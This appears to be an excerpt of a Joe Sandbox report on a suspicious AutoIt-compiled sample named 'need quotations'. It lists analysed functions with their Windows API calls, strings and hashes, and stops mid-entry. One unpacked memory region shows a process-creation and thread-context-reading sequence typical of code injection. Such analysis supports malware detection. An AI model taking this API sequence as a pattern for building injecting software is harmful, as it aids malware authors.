Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00243F86
RegisterClassExW.USER32(00000030), ref: 00243FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00243FC1
InitCommonControlsEx.COMCTL32(?), ref: 00243FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00243FEE
LoadIconW.USER32(000000A9), ref: 00244004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00244013

Strings

+, xrefs: 00243F6F
TaskbarCreated, xrefs: 00243FB6
0, xrefs: 00243F68
AutoIt v3 GUI, xrefs: 00243FA2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 57fb9def2839417492ed0f96df0a97c7276679d25e01ad0c367a5520be2cde31
Instruction ID: d71f9173811a117dc54957f8c7b2f3c979dddadd3eda5de06fc0aa1baa32d4e2
Opcode Fuzzy Hash: 57fb9def2839417492ed0f96df0a97c7276679d25e01ad0c367a5520be2cde31
Instruction Fuzzy Hash: 5221D6B5D11318AFDB01DFA4EC99BCEBBB8FB08704F00422AFA15A62A0D7B54544CF95

Function 0028BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0028BDB4: __time64.LIBCMT ref: 0028BDBE

Part of subcall function 00244517: _fseek.LIBCMT ref: 0024452F

__wsplitpath.LIBCMT ref: 0028C083

Part of subcall function 00261DFC: __wsplitpath_helper.LIBCMT ref: 00261E3C

_wcscpy.LIBCMT ref: 0028C096
_wcscat.LIBCMT ref: 0028C0A9
__wsplitpath.LIBCMT ref: 0028C0CE
_wcscat.LIBCMT ref: 0028C0E4
_wcscat.LIBCMT ref: 0028C0F7
_wcscmp.LIBCMT ref: 0028C03E

Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C65D
Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0028C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0028C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0028C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0028C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0028C371

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: d3e635853cfab5160b4db85c18a041aa695c0c2d03a3f408d43ee1d534bd40c0
Instruction ID: e7063ff1a2684a56f01e3845c88b3b13b4f8fbd0be27dab55061700a3d9a5af4
Opcode Fuzzy Hash: d3e635853cfab5160b4db85c18a041aa695c0c2d03a3f408d43ee1d534bd40c0
Instruction Fuzzy Hash: 62C14AB5911219AFDF11EF94CC81EDEB7BCAF49310F1080AAF609E6191DB709A948F61

Function 00243742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 002437B3
KillTimer.USER32(?,00000001), ref: 002437DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00243800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0024380B
CreatePopupMenu.USER32 ref: 0024381F
PostQuitMessage.USER32(00000000), ref: 0024382E

Strings

TaskbarCreated, xrefs: 00243806

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 621789c64d9564b0264a175be23ee8b962a8731e19e1af7d6549c40c9b07ee2c
Instruction ID: bad8d0763e5a96938264671c0c75b8630bbe1ab40f2d97e9627fb0450f710fe1
Opcode Fuzzy Hash: 621789c64d9564b0264a175be23ee8b962a8731e19e1af7d6549c40c9b07ee2c
Instruction Fuzzy Hash: CB4127F5131147A7DB1EEF28AC5EFBA7699F704340F500126FA82D21D1CAA0DE709762

Function 00243E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00243E79
LoadCursorW.USER32(00000000,00007F00), ref: 00243E88
LoadIconW.USER32(00000063), ref: 00243E9E
LoadIconW.USER32(000000A4), ref: 00243EB0
LoadIconW.USER32(000000A2), ref: 00243EC2

Part of subcall function 00244024: LoadImageW.USER32(00240000,00000063,00000001,00000010,00000010,00000000), ref: 00244048

RegisterClassExW.USER32(?), ref: 00243F30

Part of subcall function 00243F53: GetSysColorBrush.USER32(0000000F), ref: 00243F86
Part of subcall function 00243F53: RegisterClassExW.USER32(00000030), ref: 00243FB0
Part of subcall function 00243F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00243FC1
Part of subcall function 00243F53: InitCommonControlsEx.COMCTL32(?), ref: 00243FDE
Part of subcall function 00243F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00243FEE
Part of subcall function 00243F53: LoadIconW.USER32(000000A9), ref: 00244004
Part of subcall function 00243F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00244013

Strings

AutoIt v3, xrefs: 00243F1F
#, xrefs: 00243F09
0, xrefs: 00243F02

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 860461c2b532aac6360b78550176190f029438b1101a48572308068068089b8f
Instruction ID: 3944b32ba1b268ed45360d9cb3e4099b220f4544efc576d8b874b835e001ffd3
Opcode Fuzzy Hash: 860461c2b532aac6360b78550176190f029438b1101a48572308068068089b8f
Instruction Fuzzy Hash: 7A2141B0D11304AFCB49DFA9EC59A9ABFF9FB48314F00812BE618A72A0D7754654CF91

Function 019499C8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01949A99
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01949CBF

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: c0febd5f7c0222078878320389f8d4ebc291522321c43e6b7725d613be376c2c
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: E4A1F974E00209EBDB14CFA4C898FEEBBB5FF48309F208559E609BB281D7759A41CB54

Function 002449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00244A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002B41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002B421A
RegCloseKey.ADVAPI32(?), ref: 002B4249

Strings

Include, xrefs: 002B41D3, 002B4212
Software\AutoIt v3\AutoIt, xrefs: 00244A13

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 8888d656048dbb59d3b6115ff4bb0730388be89a1a5b5758844049ccd34351e2
Instruction ID: cbceb6d4a3b41fe0cfc578053fe5b76059c985a50f10594f1444010a378b3187
Opcode Fuzzy Hash: 8888d656048dbb59d3b6115ff4bb0730388be89a1a5b5758844049ccd34351e2
Instruction Fuzzy Hash: 5C114275620109BFDB04ABA8DD86EFF7BBCEF05344F104065B506D6191EA709E12DB50

Function 002436B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002436E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00243707
ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 0024371B
ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 00243724

Strings

AutoIt v3, xrefs: 002436DE, 002436E3, 002436E4
edit, xrefs: 00243701

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 91e052919a5e825ac1976ffb953b5a44a06deb504e63d41a2df0363e64221761
Instruction ID: bfb1e67d541ee0018131732e9556a2c021452e72f3a11de313bd7c0ea88d5789
Opcode Fuzzy Hash: 91e052919a5e825ac1976ffb953b5a44a06deb504e63d41a2df0363e64221761
Instruction Fuzzy Hash: 9DF03A705412D07AE7325757AC5CF672EBDD7C6F20F01802FBA04A22A0C5611895CAB0

Function 01949788 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01949678: Sleep.KERNELBASE(000001F4), ref: 01949689

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 019498B8

Strings

HD3ONNN2IKRY0, xrefs: 0194991B, 0194991E

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID: CreateFileSleep
String ID: HD3ONNN2IKRY0
API String ID: 2694422964-1225363544
Opcode ID: 8c60618bfa17b0e4e7432147629f5389385dd01071bd7ba94e0ff405d7b910d4
Instruction ID: 808b2ac691eb7f31076e9e4afae060387f48b663336459f6668a7f59566a06ed
Opcode Fuzzy Hash: 8c60618bfa17b0e4e7432147629f5389385dd01071bd7ba94e0ff405d7b910d4
Instruction Fuzzy Hash: 36519030E14248EBEF11DBF4C854BEEBB79AF58304F004599E209BB2C0D7B91A45CBA5

Function 00244A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00245374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00301148,?,002461FF,?,00000000,00000001,00000000), ref: 00245392

Part of subcall function 002449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00244A1D

_wcscat.LIBCMT ref: 002B2D80
_wcscat.LIBCMT ref: 002B2DB5

Strings

\, xrefs: 002B2DA2
\Include\, xrefs: 00244B0A
8!0, xrefs: 00244B1C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!0$\$\Include\
API String ID: 3592542968-1849498677
Opcode ID: 451095db8b99de89449228e6d7a5d7b99d3a9a80e2cde346fb72f029d0e7eb58
Instruction ID: 8aa8b181f76f9788f0f0dc9ce0ef3a00a7a444f437616643768b132c4f000f12
Opcode Fuzzy Hash: 451095db8b99de89449228e6d7a5d7b99d3a9a80e2cde346fb72f029d0e7eb58
Instruction Fuzzy Hash: 93518E714263408BC71DEF59D9A989BB3F8BE49300F40452FF64983260EB709958CF52

Function 002451AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0024522F
_wcscpy.LIBCMT ref: 00245283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00245293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002B3CB0

Strings

Line: , xrefs: 002B3CD9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 2a8cba4324de7d143e6ec0479dad8fef829dee48970ed6b1603abc5f865764ec
Instruction ID: 445e8d0780e194a90d28723065ab18d681e99ef6864a580ddd09fc6d586d5325
Opcode Fuzzy Hash: 2a8cba4324de7d143e6ec0479dad8fef829dee48970ed6b1603abc5f865764ec
Instruction Fuzzy Hash: 5D31BE71028751ABD329EB60DC46FDE77DCAF44340F00451BF5C992092EBB0A668CF96

Function 00244139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 002441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002439FE,?,00000001), ref: 002441DB

_free.LIBCMT ref: 002B36B7
_free.LIBCMT ref: 002B36FE

Part of subcall function 0024C833: __wsplitpath.LIBCMT ref: 0024C93E
Part of subcall function 0024C833: _wcscpy.LIBCMT ref: 0024C953
Part of subcall function 0024C833: _wcscat.LIBCMT ref: 0024C968
Part of subcall function 0024C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0024C978

Strings

Bad directive syntax error, xrefs: 002B36E4
>>>AUTOIT SCRIPT<<<, xrefs: 002B3491

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 8ea4aa8923bf8b2abd11bc749b02975e1d7da6d14d945f8081dbfc0df18dc214
Instruction ID: b8ed88a5404f7f211489f10d10040064368d0da1820f9752ec9e7120b6882355
Opcode Fuzzy Hash: 8ea4aa8923bf8b2abd11bc749b02975e1d7da6d14d945f8081dbfc0df18dc214
Instruction Fuzzy Hash: 65917F71930219AFCF18EFA4CC919EDB7B4BF18350F50442AF816AB291DB70AA64CF54

Function 002440E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B3725
GetOpenFileNameW.COMDLG32 ref: 002B376F

Part of subcall function 0024660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002453B1,?,?,002461FF,?,00000000,00000001,00000000), ref: 0024662F

Part of subcall function 002440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002440C6

Strings

t3/, xrefs: 002B3745
X, xrefs: 002B373E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3/
API String ID: 3777226403-3981693851
Opcode ID: 46a201235e408d9d6a541d51bebf8e22329bd4481fd5bc1fb76eaabe63c3698f
Instruction ID: 6e2630c00b56b994126e1d8568043468b553a0ea670d4edaa09de8ec8f526cb1
Opcode Fuzzy Hash: 46a201235e408d9d6a541d51bebf8e22329bd4481fd5bc1fb76eaabe63c3698f
Instruction Fuzzy Hash: 5521DB719201589BDF05EF94D8457EEB7F89F49304F004059E504B7241DBF456998F51

Function 002634AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 002634FE

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00263539
__wopenfile.LIBCMT ref: 00263549

Strings

<G, xrefs: 002634CD, 002634F0, 002634FC

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: edada277f416444f90ec82eaf9b67502d109eae02036fcd0bb61a495e5b46c8a
Instruction ID: 5519eea986c93ac4447bc64cc655edd8e57076573623643f13ed50a07dc47e59
Opcode Fuzzy Hash: edada277f416444f90ec82eaf9b67502d109eae02036fcd0bb61a495e5b46c8a
Instruction Fuzzy Hash: D911E370A20206DADB22FF709C4266EB6A4AF05350B158426E815DB281EF70CAF19FB1

Function 0025D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0025D28B,SwapMouseButtons,00000004,?), ref: 0025D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0025D28B,SwapMouseButtons,00000004,?,?,?,?,0025C865), ref: 0025D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0025D28B,SwapMouseButtons,00000004,?,?,?,?,0025C865), ref: 0025D2FF

Strings

Control Panel\Mouse, xrefs: 0025D2BA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: df44afe8947b15af28ccb9087bab23722caca274cf8e429e31e78f1d7ec1dbfb
Instruction ID: 50782f539ec297a66acb8074708ab9ca5204946ec2c524a09ecc5db5ff4b2744
Opcode Fuzzy Hash: df44afe8947b15af28ccb9087bab23722caca274cf8e429e31e78f1d7ec1dbfb
Instruction Fuzzy Hash: D8117975A21209BFDB208FA8DC84EBF7BBCEF04741F004469E805D7110E771AE589B64

Function 01948678 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01948E33
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01948EC9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01948EEB

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction ID: 775523f68f22affb77875c14bd2a78557087f98e1b26f46d7e35d9248ddc78c1
Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction Fuzzy Hash: AD621A30A142189BEB24CFA4C850BDEB776FF58305F1095A9D20DEB390E7769E81CB59

Function 0028C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00244517: _fseek.LIBCMT ref: 0024452F

Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C65D
Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C670

_free.LIBCMT ref: 0028C4DD
_free.LIBCMT ref: 0028C4E4
_free.LIBCMT ref: 0028C54F

Part of subcall function 00261C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00267A85), ref: 00261CB1
Part of subcall function 00261C9D: GetLastError.KERNEL32(00000000,?,00267A85), ref: 00261CC3

_free.LIBCMT ref: 0028C557

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction ID: f082629c5037dbc0110bbe18dab9a106092cdc9d3ea579571ff1629cacbaf85b
Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction Fuzzy Hash: 9E5162B5D14219AFDF15AF64DC81BAEB7B9EF48300F10049EF219A3281DB715AA0CF59

Function 0028C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule
